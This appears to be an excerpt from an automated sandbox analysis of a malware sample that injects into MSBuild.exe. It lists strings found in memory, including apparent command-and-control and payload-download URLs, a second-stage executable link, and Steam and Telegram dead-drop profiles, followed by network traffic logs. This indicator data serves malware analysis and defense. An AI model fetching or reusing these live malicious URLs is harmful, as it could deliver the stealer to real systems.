Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/freebl3.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/freebl3.dllg
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/mozglue.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/mozglue.dllC
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll2
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/nss3.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/nss3.dllZ_
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllO
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllb
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/sql.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/vcruntime140.dll
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000494000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
Source: MSBuild.exe, 00000003.00000002.2174458155.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe-
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe=
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000003.00000002.2188526414.000000001D69D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ECGIII.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: ECGIII.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ECGIII.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ECGIII.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ECGIII.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ECGIII.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ECGIII.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 0000000B.00000002.2205846539.000000000115F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frizzettei.sbs/api
Source: MSBuild.exe, 0000000B.00000002.2205846539.000000000115F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frizzettei.sbs/apiwDVP
Source: JKECFC.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: HJEHIJ.3.dr	String found in binary or memory: https://support.mozilla.org
Source: HJEHIJ.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HJEHIJ.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs/api
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs/cDWE
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs/pi
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs:443/api
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ECGIII.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: ECGIII.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 53684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53901
Source: unknown	Network traffic detected: HTTP traffic on port 53650 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53906
Source: unknown	Network traffic detected: HTTP traffic on port 53730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53904
Source: unknown	Network traffic detected: HTTP traffic on port 53683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53909
Source: unknown	Network traffic detected: HTTP traffic on port 53808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53908
Source: unknown	Network traffic detected: HTTP traffic on port 53672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53648 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53727
Source: unknown	Network traffic detected: HTTP traffic on port 53755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53846
Source: unknown	Network traffic detected: HTTP traffic on port 53698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53724
Source: unknown	Network traffic detected: HTTP traffic on port 53841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53729
Source: unknown	Network traffic detected: HTTP traffic on port 53858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53728
Source: unknown	Network traffic detected: HTTP traffic on port 53732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53840
